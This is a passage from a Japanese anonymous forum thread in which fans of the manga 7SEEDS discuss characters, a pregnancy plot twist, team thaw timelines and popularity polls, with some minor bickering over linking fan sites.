どうでもいい人になってる。
嵐ですら、花の恋人っていう設定以外に
あまりキャラが立ってないような。

>>266
本誌では今まさに花達と絶賛接触中。
分裂したり妊娠したり人質取ったり。

268 :花と名無しさん:2006/11/07(火) 17:21:06 ID:DYvZ6qIK0
>>267
まぢですか?

エッチ禁止じゃなかったんですか?

本誌は9巻からどれくらいすすんでるんでしょうか?

269 :花と名無しさん:2006/11/07(火) 19:02:18 ID:???0
マークさんが大好きな人いませんか?
男なのにかわいいです

270 :花と名無しさん:2006/11/07(火) 20:12:51 ID:???0
>>268
エッチ禁止なんてきまり作ったぐらいで本当にエッチしないようなら、人類は60億人まで増えてないよ。

271 :花と名無しさん:2006/11/07(火) 22:06:04 ID:???0
>>270
中国人乙

272 :花と名無しさん:2006/11/07(火) 22:35:11 ID:???0
ヤルんだったら、断然、源五郎がいい

273 :花と名無しさん:2006/11/07(火) 23:04:05 ID:???O
動物の声です

274 :花と名無しさん:2006/11/07(火) 23:54:43 ID:???O
蝉がくるみにちょっかい出してた時はもう流星とデキてたんだろうかw
妊娠のこと知ったら、あのかわいこちゃんが…ガーンとなりそう。

>>267
まあ、主人公の成長ものは燃えるので、田村さんが動かしやすくなるキャラにまで変えてくれるの
を気長に待つことにしよ。そうなりゃ話的にも閉塞感が抜けてもっとおもしろくなるはずだし…い
や、むしろそうならないと存在意義がヤバい。

275 :花と名無しさん:2006/11/08(水) 02:41:54 ID:???0
こっそりやってたけどゴムなしなので自然と妊娠したと
次に妊娠するのは誰じゃい

276 :花と名無しさん:2006/11/08(水) 08:48:15 ID:???0
どんなに知能が発達したとしても、人間は動物なんだから(本来の意味で)
生殖本能が何より勝るのは当たり前のことだわな。

277 :花と名無しさん:2006/11/08(水) 13:47:55 ID:???0
さすがに初体験が野外とかはやなんじゃないかと思うけどね。
秋は家もあって、生活がそこそこ落ち着いてたからこそかな。

278 :花と名無しさん:2006/11/08(水) 20:15:12 ID:???0
流星とくるみは、ハッパやってラリってる勢いでやっちまったんじゃないのか?
お蘭の支配体制に鬱になっていたかとは思うけど、多分セックルしたときは
精神的に正常じゃなかったんじゃねか?

279 :花と名無しさん:2006/11/08(水) 20:32:22 ID:???O
それはエロいシチュだな〜。でも流星のタイプからいって普通に奴から手を出して、くるみも受け
入れたんじゃないかな。

280 :花と名無しさん:2006/11/08(水) 21:03:48 ID:???0
父親は実は流星じゃないと思うな

281 :花と名無しさん:2006/11/08(水) 21:39:15 ID:???0
>>280
!!!

刈田とか?だから差し入れを?

282 :花と名無しさん:2006/11/08(水) 21:41:24 ID:???0
くるみの弱虫な性格だったらお蘭の決めたルールを破ってセクースなんて
こわくて出来ないと思う

283 :花と名無しさん:2006/11/08(水) 21:44:08 ID:???0
刈田は健気だよね。
スパイなんてバレたら殺されかねないもの。

284 :花と名無しさん:2006/11/08(水) 21:45:06 ID:???0
>>281
秋ヲかも
だからお蘭がカンカンヽ(`Д´)ノウワァァン になってるのかな。
チームのルールを破ったのが気に食わないならさっさと見捨てるなり
追い出すなりするもんだが分裂した挙句「殺してやる」とまで言わせる原因は何?

285 :花と名無しさん:2006/11/08(水) 21:49:20 ID:???0
>>284
私は違うと思う。
その辺は秋ヲの意思は固いと思うな、絶望が深いというか。
蘭にしても、いわゆる嫉妬に狂ってるって感じはしない。

286 :花と名無しさん:2006/11/08(水) 22:10:29 ID:???O
>>283
スパイっていうか、妊娠発覚の時にはもうくるみ派だったんだろうけど、残って監視してたほうが
いいとふんだんだろうか。その辺り1話でも見たかったな。

287 :花と名無しさん:2006/11/09(木) 00:10:30 ID:???0
マークさんいいなあ・・・

288 :花と名無しさん:2006/11/09(木) 09:47:30 ID:???O
ガイド役の人が妊娠さしたんかと思ってた

289 :花と名無しさん:2006/11/09(木) 10:58:36 ID:???O
なんで普通に流星だと思えないんだ?w

290 :花と名無しさん:2006/11/09(木) 11:02:45 ID:???0
>>288
それしたら十六夜さんはホントに蘭に殺されるだろw

291 :花と名無しさん:2006/11/09(木) 11:38:50 ID:???O
隕石で地球滅亡の夢見たよ(つд`)
やっぱオイラみたいな凡人はシェルターに入れなくて。
大好きな家族と死を迎えたけど死ぬ瞬間これで自分が消えると思うと怖かた。。。
やっぱあんな未来でも生きていたいと思ってしまた。。。

292 :花と名無しさん:2006/11/09(木) 12:07:25 ID:???0
マークさん好きな人いないの・・・?

293 :花と名無しさん:2006/11/09(木) 13:39:45 ID:???0
普通に好きだが思いいれるほどではない。
那智タイプだよね。

294 :花と名無しさん:2006/11/09(木) 13:44:04 ID:???0
那智って誰?

295 :花と名無しさん:2006/11/09(木) 13:47:46 ID:???O
>294
つBASARA

296 :花と名無しさん:2006/11/09(木) 13:50:16 ID:???0
BASARAか...
だよな、田村スレだもんな


一瞬イティハーサの那智かと思っちゃった

297 :花と名無しさん:2006/11/09(木) 13:54:28 ID:???O
7種もそろそろキャラへの思い入れが強くなってきた頃だと思うけど、一番人気があるのは誰だろう?
BASARAとは違って、チーム毎にドラマが違うし、主要メンバーも多いから一人に人気が集中することはないだろうけど。
男キャラなら鷹・涼・安居あたりが妥当なとこか。

298 :花と名無しさん:2006/11/09(木) 13:55:22 ID:???0
同じ那智でもえらい違い…。
BASARAの那智だったら、あの世界でも元気に生きていきそう。
市松とか朱理も大丈夫そう。

299 :花と名無しさん:2006/11/09(木) 15:53:28 ID:???0
最強は多聞だと思う

300 :花と名無しさん:2006/11/09(木) 15:53:53 ID:???0
本多多聞?

301 :花と名無しさん:2006/11/09(木) 16:27:27 ID:???0
>>297
女は難しいね。3ヒロイン(ナツ、花、小瑠璃)はアンチも多いし。
このスレで人気投票をすればナツ、雑誌でやれば花が勝ちそうな気がする。
脇キャラが勝っても驚かない。

302 :花と名無しさん:2006/11/09(木) 17:55:21 ID:???O
どういうわけか、ここ以外でも意外にナツが鷹、安居、涼と互角に票を獲得してたりするからよく
わからないw 2ch内にも確か投票スレあった。

303 :花と名無しさん:2006/11/09(木) 18:27:48 ID:???O
女の子だったらあゆが好きかなぁ…
男は源五郎がいい。
でも夏Aは今後の登場時は人格歪んで
変貌しちゃってる可能性あるのがツライとこ

304 :花と名無しさん:2006/11/09(木) 18:36:58 ID:???O
自分もあゆ好きだ。
でも本当に、夏Aはどんな風に変わって出てくるのかわからないから、今後によるね。
安居なんて何回変貌することになるのやら。
(のばら事件後にも変化があったし)

305 :花と名無しさん:2006/11/09(木) 18:50:48 ID:???0
女なら繭ちゃんだな
死んじゃったけど・・・

306 :花と名無しさん:2006/11/09(木) 20:49:50 ID:???0
私もあゆ好きだった。後半は人格ゆがんでそうだったけど...

ナツは癒し系マドンナとして成長し、夏Aを癒してあげてほしい。
安居は嵐に似てるからお似合いだし。

307 :花と名無しさん:2006/11/09(木) 21:22:58 ID:???0
そういう展開になればいいな。
鷹は花じゃなくてあゆに出会って彼女を癒して欲しかった。


308 :花と名無しさん:2006/11/09(木) 21:37:05 ID:???0
鷹には牡丹姐さんを押す!

309 :花と名無しさん:2006/11/09(木) 22:03:18 ID:???0
そうはいっても、花と出会ってなきゃ、鷹は救われないからねー。
あゆも牡丹も、初対面で笑ってくれる人ではなさそうだから。

310 :花と名無しさん:2006/11/09(木) 22:07:02 ID:???0
>>309
鷹は花と出会って救われたことで
後々誰かを救うことができるんじゃないかね。

鷹じゃなくても、誰でもいいので
ちゃんと夏Aが救われる展開であってほしい・・・

311 :花と名無しさん:2006/11/09(木) 22:54:32 ID:???O
夏Aが癒される為には…

安居→今度こそ守りたい大切な人間を守れる
涼 →他チームの実力を認める事ができる
小瑠璃→親身になってくれる友達ができる
あゆ→優しい裏表ない愛情
源五郎→未来の動物との触れ合い
ばん→自分の手で命を助ける
虹子→?

こんなとこかな。
虹子はわからん。

312 :花と名無しさん:2006/11/09(木) 23:08:14 ID:???0
虹子どう転ぶかわかんないよね…ある意味期待

313 :花と名無しさん:2006/11/09(木) 23:10:37 ID:???O
虹子か…
他人を損得抜きで見れるようになる、とか?

314 :花と名無しさん:2006/11/10(金) 00:45:14 ID:???O
>>309
花が中心になってる今じゃあどんな女性と絡んでも花は別格のままだろうなあ…。(ナツだとわか
らないけど)
>>310
というか既に花も鷹に救われてるしね。もともと誰かの役に立ちたいと何年も何年も思い続けて来
たんだから、花を介してじゃなく単独で夏Aと絡んでほしいような。


315 :花と名無しさん:2006/11/10(金) 01:07:04 ID:UmzIxkULO
美帆さんって、Xdayまでに死んでそう。だからたかしさん笑わないのかな。

316 :花と名無しさん:2006/11/10(金) 01:27:26 ID:???0
花が冷凍されるまでは生きてるよね。
で、花冷凍が10月末。
Xデーが9月1日?
次の年の9月としても、何があってもおかしくないくらいの間はあるか。

317 :花と名無しさん:2006/11/10(金) 01:28:17 ID:???O
>>314
でも「この人に会うために生きてきた」とか、
花を抱き締めて「戦う場所を見つけた」とか、
鷹は既に花専用犬としてインプリンティング済みな気がするんだよね…。
鷹には幸せになって欲しいんだけど、役割的には
花を守り抜いてあぼんとかありそうな感じ。

318 :花と名無しさん:2006/11/10(金) 01:45:35 ID:???0
生き残ったチーム全員で爽やかに野球の試合する図とか見たい

319 :花と名無しさん:2006/11/10(金) 02:25:53 ID:???O
>>317
犬って言わんでくれ…。
モノホンいっぱいおるんやし。

320 :花と名無しさん:2006/11/10(金) 02:30:21 ID:???O
>>317
花専用犬…うーん、否定はできないが。でも刷り込みされたアヒルの雛だって、いつかは親離れす
るんだし…。第一彼が誰かや花のために死んでも感動より虚しさが残るだけだよ。
花の株が上がるわけでもないし。(むしろ逆)

321 :花と名無しさん:2006/11/10(金) 04:45:03 ID:???O
花が鷹を庇ってあぼん
虹子も涼を庇ってあぼん、死に際に涼への愛に初めて気付く とかさ

322 :花と名無しさん:2006/11/10(金) 07:59:34 ID:???0
花が鷹を庇って死んだりしたら、鷹にとってもたまらんと思うけどな。あの時と同じってことで。
鷹が花に癒されて彼女を護ってるのがどうしてもイヤな人がいるのね。犬なんてヘンテコな例えまでして。
あゆなんてありえないシチュエーションまで出して叩かれて。花の人徳(人気)の無さが祟ってるんだろうけど。
朱里がいながら揚羽に護られてた更紗の時は、揚羽は「更紗の犬」「更紗から早く離れて」なんて言われて
なかったような気がするし。

323 :花と名無しさん:2006/11/10(金) 09:07:19 ID:???O
確かに本音を言わせてもらえば、実際マジでイヤなんだよね。花を庇って死ぬなんてよく言われる
からてのもあるが、そこは花本人のせいだけじゃなく、あらゆる面で至れり尽くせりのキャラをど
うしようもなく不運な、かつての主役に守らせるという構図がどうしてももやもやする。
それに花や嵐といると彼もナツもサブキャラ扱いになるし。夏Aすらそうなるだろう。
実際鷹にとっても吹雪と美鶴の二の舞を起こさないために、花に付くのは有意義なことなはずなん
だけどねえ。


324 :花と名無しさん:2006/11/10(金) 09:14:43 ID:???O
あ、私は>>307じゃない。でも>>307程度のレスで花が叩かれてると思うなんて、過敏になってな
いかな。

325 :花と名無しさん:2006/11/10(金) 09:25:11 ID:???0
ああ、>>322の言ってるあゆのありえないシチュって>>307のことか。
なにをかっかしてるのかと思った。

>>307はあゆ叩きじゃなくてただのあゆ好きで
彼女を誰かが癒してくれる展開キボンなだけだと思うけど…

326 :花と名無しさん:2006/11/10(金) 09:51:27 ID:???0
どっちかってーと、322が怒ったのは
犬っつー例えの方じゃないかと思うが。
キモイ言い方するなと私も思ったよ。

327 :花と名無しさん:2006/11/10(金) 10:03:19 ID:???O
それには319がつっこんでるじゃないか。

328 :花と名無しさん:2006/11/10(金) 10:03:43 ID:???0
私は上手いなーと思ったw

329 :花と名無しさん:2006/11/10(金) 10:07:05 ID:???0
>>326
あと、あぼんを願うような>>321とかもあるのでは。
どっちにしろ、怒った原因はひとつではないかと。

>>328
鷹好きとしては、非常に気分悪い例えだが。

330 :花と名無しさん:2006/11/10(金) 11:34:48 ID:???O
自分的には鷹がそれほど花が好きでしょうがない、という気がしないのが救い。
花と嵐の思いは鉄壁だからね。花への思いは誰かを救いたい、の中のあくまで一つであってほしい
というか。

331 :花と名無しさん:2006/11/10(金) 13:59:22 ID:???O
「花専用犬」という言い方をしたのは私です。
私は鷹も犬も大好きだし、鷹は花に一途だし、犬達と長く暮らしてる間に
「自分の役割を一心に求める」っていう犬的性格になったと思うし
犬達にとってはリーダーなので頭領犬的イメージで例えてそう書いたんだけど、
そこまで不愉快にさせているとは思わなかった…ごめんね

332 :花と名無しさん:2006/11/10(金) 14:37:24 ID:???0
鷹好きの花嫌いだけど>>317禿同だったよ。
自分の場合は好意的な意味でも中立的な見方でもなく
>>330の「花と嵐の思いは鉄壁」を前提に
当て馬みたいに見えて嫌でしょうがないって意味で。

333 :花と名無しさん:2006/11/10(金) 16:59:02 ID:???0
キャラ人気投票
ttp://www.geocities.jp/nanatanebitari/
チーム人気投票
ttp://7seeds.blog77.fc2.com/
上記ではけん

334 :花と名無しさん:2006/11/10(金) 18:12:21 ID:???O
身も蓋もない言い方だけど、吹雪も美鶴も鷹の境遇を生み出すために死ぬことが前提のキャラだと
思う。繭もあの最期でキャラが立って忘れられない子になった。だけど鷹は十分キャラ立ちしてる
し、これ以上かわいそうな目にあわす必要性は感じないんだな。その辺りちゃんとバランスはとれ
る作者だと思いたい。

335 :花と名無しさん:2006/11/10(金) 18:40:33 ID:???O
一般サイト晒すなよ…普通に検索すりゃ出てくるんだし。

336 :花と名無しさん:2006/11/10(金) 20:11:55 ID:???0
夏Aチームって、育つ過程の運動で野球をやってないんだよね。
それにありとあらゆる動物を飼っていたのに、犬だけは飼っていない。
野球と犬という鷹にとっての2大アイテムを夏Aにどう絡めていくのか楽しみ。
鷹が野球に例えて説教しても伝わらなさそうw

337 :花と名無しさん:2006/11/10(金) 20:37:34 ID:???0
>>335
別にいいじゃないの?
一般公開してるものなんだし

338 :花と名無しさん:2006/11/10(金) 20:50:25 ID:???0
ここは2ちゃんだってことをお忘れか?

339 :花と名無しさん:2006/11/10(金) 20:50:49 ID:???0
夏Aはそれ以外にも、誰でも知ってる芸能人ネタとかも
通じないんだよねー
そういうちょっとした齟齬ネタとかも描いてほしいな。
ゲームとか漫画とかも知らないだろうし、
「のび太」の由来もわからないだろう。

340 :花と名無しさん:2006/11/10(金) 21:09:10 ID:???0
>>338
それがどうしたの?

341 :花と名無しさん:2006/11/10(金) 21:10:08 ID:???O
インターハイやオリンピックに出たらいい線行けそう…
なんてことは言ってたね。
どこで得た知識なんだろう。

342 :花と名無しさん:2006/11/10(金) 21:22:33 ID:???0
>>321は女嫌いで男の子大好きな腐女子。
最後は女みんなあぼーんで、鷹や安居や涼や蝉やハルなどがくんずほぐれずの801漫画になって欲しいんだよ、うん。
若しくは百舌が男の子達をはべらせるハーレム物とか。

343 :花と名無しさん:2006/11/10(金) 21:26:35 ID:???0
外の世界はテレビの中だけというモノローグがあったから
テレビを見ることは出来たんじゃない?
冷凍された時点までの知識だろうけど。

344 :花と名無しさん:2006/11/10(金) 21:29:45 ID:???0
>>341
のばらが手紙書くからと言って出て行ったあと連絡が無いのを気にする小瑠璃に繭が
「ここの住所や電話番号教えてもらってないとみた」とか言ってるよね。
手紙や電話で外部と通信するということを知ってるんでチョット驚いた。

345 :花と名無しさん:2006/11/10(金) 21:31:42 ID:???0
>>340
過去、2ちゃんで晒されて閉鎖に追い込まれたサイトは数多い。
そうなった時責任とれるの?

346 :花と名無しさん:2006/11/10(金) 21:33:49 ID:???0
描かれてはいないけど、外に行けば自分の親がいる、脱落すれば親の所にいける
とか思ってわざと脱落した子もいるかもしれんね。
まあみんな肥料になってるわけだが。

347 :花と名無しさん:2006/11/10(金) 21:35:59 ID:???0
夏Aが野球を必要としなかったのは…7人じゃできないからだポ

348 :花と名無しさん:2006/11/10(金) 21:38:54 ID:???0
ガ━━(゚Д゚;)━━ソ!

349 :花と名無しさん:2006/11/10(金) 21:44:01 ID:???0
そういえば球技はやってないんだっけ。
7人で出来るのってミニバスケくらい?

350 :花と名無しさん:2006/11/10(金) 21:45:55 ID:???0
走るのと泳ぐのと登るのだけだったはず。球技はやってない。

351 :花と名無しさん:2006/11/10(金) 21:49:30 ID:???0
サバイバルには必要無いからだろうね。
団体で球技をやっていると身につくだろう
チームワークとかも必要とは思われていなかったろうし。

352 :花と名無しさん:2006/11/10(金) 22:51:47 ID:???0
>>346
そもそも外に親がいる設定だっけ?

353 :花と名無しさん:2006/11/10(金) 22:54:34 ID:???0
でも武器がない状態での攻撃手段として、そこらへんの石とかを
投げる、とかいう時のためにボール投げくらいはやってそう。
とすると、鷹も真っ青なくらいに直球で豪速な球を狙ったところに
命中させるくらいの芸当はしてみせそうだ>夏A

354 :花と名無しさん:2006/11/10(金) 22:59:28 ID:???0
>>352
試験に落ちた者は「帰ってもらう」という表現をしていたね

355 :花と名無しさん:2006/11/10(金) 23:02:47 ID:???0
>>335
ここで言うべき科白はそれじゃない

宣伝乙

これが正解

356 :花と名無しさん:2006/11/10(金) 23:37:30 ID:???0
>>345
何の責任だよ?
晒されたぐらいで閉鎖するような細い神経の奴が悪いんじゃないの?
全世界に情報発信してるっていう自覚ぐらい持てって感じ

357 :花と名無しさん:2006/11/10(金) 23:42:59 ID:???O
馬鹿が一匹まぎれこんでるな。

358 :花と名無しさん:2006/11/10(金) 23:43:55 ID:???0
匿名掲示板でこれ以上吼えるなよ。
よく吼える犬は弱い犬〜

359 :花と名無しさん:2006/11/10(金) 23:47:04 ID:???0
356の精神が図太いことだけはわかった。

360 :花と名無しさん:2006/11/11(土) 00:25:27 ID:???0
>>331
犬って蔑称でよく使われるからこれからは使わない方がいいよ。

361 :花と名無しさん:2006/11/11(土) 01:53:18 ID:Tef2DcD10
>>357
お前だろw

362 :花と名無しさん:2006/11/11(土) 03:03:35 ID:???0
>>356
こいつだ

363 :花と名無しさん:2006/11/11(土) 03:52:09 ID:???0
>>359
お前が糞神経質なことはわかったw

364 :花と名無しさん:2006/11/11(土) 07:36:41 ID:???0
>>363
2chでやったら顰蹙かう行為だって事が理解できない時点で
空気を詠めてない奴

365 :花と名無しさん:2006/11/11(土) 10:38:06 ID:g0eSa1ZHO


366 :花と名無しさん:2006/11/11(土) 11:58:29 ID:???O
ところでさ、今回から始まった人類滅亡の過去回想編ってどのくらいの長さになるんだろうね?
夏Aの時も唐突に始まって一年以上続いた訳だし、また長く続くのでは…とちょっと不安。
でも今回のはノートを読んでる花達も出てくるくらいだから、2・3ヶ月くらいで終わるかな?

367 :花と名無しさん:2006/11/11(土) 12:20:15 ID:???O
メインキャラはじわじわと、その他大衆はごっそり死んでくんだろうな。
今の章自体は次巻にまたがるだろうし。じっくり描写されるとなると、最大で11巻引く2、3話ま
でだと思う。

368 :花と名無しさん:2006/11/11(土) 12:39:37 ID:???0
長く回想続く方がいいよ
マークさんとそれだけ長い間会えるんだし

369 :花と名無しさん:2006/11/11(土) 12:40:36 ID:???O
アンカー使おう!

370 :花と名無しさん:2006/11/11(土) 13:18:06 ID:???O
気になる展開だからしっかり見たいけど、いい加減夏Bに会いたいな。

371 :花と名無しさん:2006/11/11(土) 18:32:53 ID:???0
7seedsの夏Aチーム試験偏はバトルロワイヤル化してないか?

372 :花と名無しさん:2006/11/11(土) 18:34:49 ID:jTQ2EAnA0
夏Aと夏Bって目覚めた年って同じなの?



373 :花と名無しさん:2006/11/11(土) 19:09:57 ID:???O
>>372
どうだろうね。
ドラマ的には同時期の方が面白いけど。
タイムラグがあって、秋同様にすっかり落ち着いて村を作ってるよりも、
目覚めてすぐ(彼らにとっては地獄のテスト直後)に他チームと遭遇する方が盛り上がりそう。
容姿やキャラの点でもかなり作りこまれて定着してるし、
全員成長して登場とは考えにくいので、あのままの姿で出てくると思うな。
一番最初に眠りについたチームが一番最後に目覚める…という展開と予想。

374 :花と名無しさん:2006/11/11(土) 19:14:51 ID:???0
なんか、冬の北海道が一番で、だんだん南下しているところから、
気候が人が住める状態になった順に解凍されるのだとしたら、
夏Bと同じくらい…っていう気がする…

375 :花と名無しさん:2006/11/11(土) 20:49:42 ID:jTQ2EAnA0
夏Aのうちの一人が夏Bの百舌だど思ったんですよ
何年か先に目覚めてこっそりBに合流したんじゃないかと


376 :花と名無しさん:2006/11/11(土) 23:15:59 ID:???0
>>373
自分は同時期だと思う。(夏Bと春が同時期であることを前提に)
理由は、夏Aと花の年齢を同じにしたのはそれだけ意味があるんじゃないかなと思ったから。
夏Aたちの17年と花の17年を、(良い悪いとかじゃなく)いろんな意味で対比できるように。
ともに貴士が(これもいろんな意味で)育てた子どもたち同士だし。

まあ、そうなると花が17歳になったときにXデーが来るのは、都合と言えば都合なんだけど。

377 :花と名無しさん:2006/11/11(土) 23:51:20 ID:???O
私は>>373派だな。最終テストの時に解凍時の花と同じ年なのが意味あるとして。
出会った時に一歳くらい花が上だったとしてもかまわない気がする。ナツが17になった頃に解凍さ
れたりするのもおもしろいかも。
そう言えば花はくるみのことを「あの子」と呼んでたけど、3年前に目覚めたんなら年上なんじゃ?

378 :花と名無しさん:2006/11/12(日) 00:02:32 ID:???O
百舌って要だと思ってた
Bチームと一緒に行くって言ってたから…

夏Aは、主人公格のキャラ達がいろいろ乗り越えて一旦落ち着いた辺りで
敵っぽいもの(ギスギスした殺戮集団とか)として登場するのかなあ…
最終的に「人間の敵は結局人間」って話に行くのかなと。

彼らだけが生まれ育ちをあれだけ丁寧に描かれたのはそれ相当の意味
(悲しくも悪役として未来に現れてしまう等)があるんだろうと思うし。

379 :花と名無しさん:2006/11/12(日) 01:32:06 ID:???0
夏A登場時にナツ、花と夏Aのどっちの視点かによって解凍時期が決まりそうな気がする
ナツ花視点で行くなら、夏Aはすでに解凍され環境にも順応し、かなりの力を持った「敵」として現れそう
夏A視点で行くなら、何年か経てばそれなりに形作られてるであろう夏Bや春の世界に荒んだ状態の夏Aたちが飛び込み
彼らと関わりながら、少しずつ人間性を取り戻していくって感じになるのかな

380 :花と名無しさん:2006/11/12(日) 03:20:48 ID:l1F+34CNO
嵐達が見つけた船は夏Aの船という可能性あるかな?

381 :花と名無しさん:2006/11/12(日) 08:20:09 ID:???0
どうかな?
夏Aが実習で乗ってた船は帆船だったよね?
自然の力だけで動く奴。
ぞうとらいおんまるは違うように見えるけど。

382 :花と名無しさん:2006/11/12(日) 12:15:24 ID:???O
あの船も手動じゃない?何十年先に目覚めるかわからない7種のためにエンジンで動く船なんかを
残す発想では余計つっこまれる。

383 :花と名無しさん:2006/11/13(月) 01:31:27 ID:???0
>>375
前はよくそういう説出てたけどさ夏Bも夏Aも海底深く沈められたっぽいから
一度目覚めてまた冷凍装置に潜ってまた沈むのってさすがにムリポと思う

384 :花と名無しさん:2006/11/13(月) 08:31:42 ID:???O
入れ替わるとするならXデーより前しかありえないだろうね。

385 :花と名無しさん:2006/11/13(月) 16:50:55 ID:???O
7SEEDSって人気どのくらいある?
すごい面白いけど密かにしか流行ってない感じだね

386 :花と名無しさん:2006/11/13(月) 19:46:11 ID:???0
自分は最近紀伊國屋書店で平積みフェアしててそれで知った
試しのつもりで1巻と無料小冊子を手に取り翌日大人買い…

387 :花と名無しさん:2006/11/13(月) 19:49:36 ID:TH3c2Qxf0
俺38のおっさんだけど、ラーメン屋で読んでその日に大人買い。
そのラーメン屋はおっさんのくせに萩尾、竹宮、一条、池田とか大御所少女漫画が多いんだよな
おっさんのくせにw

388 :花と名無しさん:2006/11/13(月) 20:13:00 ID:???0
娘(もしくは、妻)が買って、読み古したものを置いてるんじゃないのか



まあでも、老若男女に浸透する要素はあると思うけど

389 :花と名無しさん:2006/11/13(月) 21:12:11 ID:???0
旦那がハマって買ってきた…
サバイバル物が好きなんだよね

390 :花と名無しさん:2006/11/13(月) 22:40:02 ID:???0
百舌の正体が誰で本当の目的は何なのか、
細かいことは明かされていないけど、
夏A関係者で夏Aチームに用がある事は間違いないはず。

なので解凍順は
   夏B → 夏A
時差は
百舌が目覚めて生きる地盤固めて移動するのに必要な時間で
数ヶ月〜1・2年程度だろうと思う。

391 :花と名無しさん:2006/11/13(月) 23:21:11 ID:???0
本来の保存候補だった百舌はどこに放っぽり出されたんだろう

392 :花と名無しさん:2006/11/14(火) 00:27:57 ID:???0
>>390
私もそのくらいの時差を望んではいるけど、
冷凍装置に他チームとの時差を設定するのは無理なんじゃないか?
特に後に眠った方を先に目覚めるようにするなんてのは。

393 :花と名無しさん:2006/11/14(火) 00:43:12 ID:???O
織田信綱ってどういう人物なんだろうね。うろんな感じはするが、本当にそうだったら「またこの
手のおっさんかい」と思ってしまうんで、いい意味で期待を裏切ってほしいわ。

394 :花と名無しさん:2006/11/14(火) 08:33:38 ID:???0
>>390
2年も開くとね、夏Aが登場する頃にはナツも花もいろんな苦労や経験をして、もしかしたら仲間の死なんかも乗り越えて、
サバイバルの技術も会得し、人間的にも成長した大人になってそう。主人公補正も入れて。
そこに「おらおら、お前ら支配すっぞ」と小僧小娘な夏Aが現れても一方的なDQNに見えちゃうかも。それにナツや花が
一方的に癒す役になりそうだし。
夏Aとナツ(夏B)、花(鷹+春)のぶつかり合いは未熟と未熟の対立の方がおもしろいと思うので、時差はほとんど
無しがいいな。

395 :花と名無しさん:2006/11/14(火) 11:39:00 ID:???0
だね〜
お互いに影響しあって成長してく感じがいい

396 :花と名無しさん:2006/11/14(火) 12:15:23 ID:???0
でも小さい頃からずっとサバイバル訓練受けてた人と比べると、2年くらいじゃ差はそう縮まらない気がする。
ってか夏Aが好きだから優位に立って欲しいだけなんだろうけど・・・

397 :花と名無しさん:2006/11/14(火) 12:44:42 ID:???O
夏Aは未熟てか、間違った成熟を強制された感じだ
花やナツには未熟だからこその綺麗事でそれを崩すべくがんばってほしい
ロビンソン・クルーソーが猫の子を捨てたのはやっぱよくないよ的に。

398 :花と名無しさん:2006/11/14(火) 13:31:39 ID:???O
未熟対未熟より、できれば少しでも近い経験を手に入れてから出会ってほしいです。
夏Aよりナツ側に肩入れしてるからそう思うんだけど。花も鷹も解凍されてからけっこう際どい目
に遭ってるからいいとして。

399 :花と名無しさん:2006/11/14(火) 17:51:50 ID:???O
話豚切るが、Y隣堂にタムさんの描いた色紙飾ってた(゚∀゚)デスノの色紙の下に!
なんかうれしかったな。ちなみに嵐と花のツーショットでした〜

400 :花と名無しさん:2006/11/14(火) 20:48:02 ID:???O
夏A話からマジで面白くなった

が、話の進行度か果てしなく遅いな…30巻くらい軽くいきそう

401 :花と名無しさん:2006/11/14(火) 20:55:41 ID:???O
海外ドラマのLOST見て思ったんだけどさ…。
医者少なすぎだろ、7種チーム内。
全員がある程度の応急処置ができる夏Aはいいとしても、
各チームに一人は医者(それもかなり腕利きの)が不可欠だと思うなあ。
藤子なんて医大生ですらないし、正直知識も経験も半端すぎて役に立たないのでは。
ガイド+医者の9人体制だったらよかったのに。
ガイドが全員公務員というのはよく出来た設定だと思うんだけどね。

402 :花と名無しさん:2006/11/14(火) 21:15:58 ID:???0
>>399
ああ、最近フェアで全国主要書店にばら撒かれた複製色紙ね。
カラーってとこが力はいってるな、と思った。

403 :花と名無しさん:2006/11/14(火) 22:58:14 ID:???O
現在は夏Bが目覚めてからどれくらい経ってるんだろう?

404 :花と名無しさん:2006/11/14(火) 23:25:25 ID:???0
>>401
しかし、医者がいたとしても道具と環境が揃ってないと、その真価は発揮出来ないからねぇ。
もっとも、いないよりはマシだが…。

405 :花と名無しさん:2006/11/14(火) 23:44:44 ID:???0
素手で薬も道具もなくできるのって、人工呼吸と心臓マッサージくらいかな…

406 :花と名無しさん:2006/11/15(水) 00:42:44 ID:???O
>>403
みんな考えてもしょうがないと思ってるのか、いつもこの手の質問は反応ないんで自己レスだが、
半年ぐらいでいいのかな。実際もっと時間経ってそうだけど。

407 :花と名無しさん:2006/11/15(水) 02:17:30 ID:???0
ナツの髪の伸び方を考えると(髪は平均で1ヶ月1cm伸びる)
確かに半年くらい?
嵐の髪の伸び方がまだ短めだし、もうちょい短い期間かも

408 :花と名無しさん:2006/11/15(水) 08:46:26 ID:???O
夏Bの登場は、夏Aとのガチンコ勝負のために温存してそう。

409 :花と名無しさん:2006/11/15(水) 11:39:53 ID:???O
>>407
6巻の最後の花とナツが同時期だとすると今はそこから半月後くらい?それからまた花が春チーム
に戻って、嵐もそこで春チームに出会うのにはまた3ヵ月くらいかかるかな。
夏Aはその間に秋チームと関わったりして。そうすると夏Bが目覚めてから一年以上後に花とは関
わることになるかなあ。実際どうなるのかわからないけど。
花と嵐が再会したら一旦一段落してほしいんだけどな。夏Aとは第二部で、みたいに。
再会前にニアミスがあったらおもしろいかもしれないけど。


410 :花と名無しさん:2006/11/15(水) 16:14:01 ID:???O
ニアミス、既に1度はあったよね?鷹と会った時に。
昼メロみたく二人のすれ違いをあんまり引っ張られるのも
しんどいなあ。

411 :花と名無しさん:2006/11/15(水) 17:21:14 ID:???O
ニアミスってのは不適切だったかな。6巻で花・鷹と百舌が遭ったのみたいなのを夏Aと花がって
意味です。ちなみに花と百舌の影に隠れて印象薄かったかもしれないが、鷹と百舌のもよく見れば
意味深な出会いだったよね…?

412 :花と名無しさん:2006/11/15(水) 21:40:27 ID:???0
百舌の正体が誰であるにせよ場合によっては種を殺す事も辞さない死神と
花を(多分誰であろうと)生かそうとする鷹。対照的だ。

誰かを救いたい 誰かの役に立ちたい 
 という基本的姿勢は同じなのかもしれないけど。

413 :花と名無しさん:2006/11/16(木) 10:12:01 ID:???0
どうでもいいことかもしれないけれど、
7SEEDSに選ばれた(花・嵐と夏Aを除く)メンバーには、家族以外の大切な人、っていないんだね。

それは、もしかしたら、政府側の配慮?
「大切な人がそばにいないのに生きていてもしょうがない」と思うメンバーが出ないように?

414 :花と名無しさん:2006/11/16(木) 11:47:48 ID:???0
いたでしょう。
だから秋ヲ、蘭なんかは政府を憎んでるし自暴自棄になってるんじゃない。
他も露骨に態度に表さないだけで。

415 :花と名無しさん:2006/11/16(木) 12:03:10 ID:???0
>>413
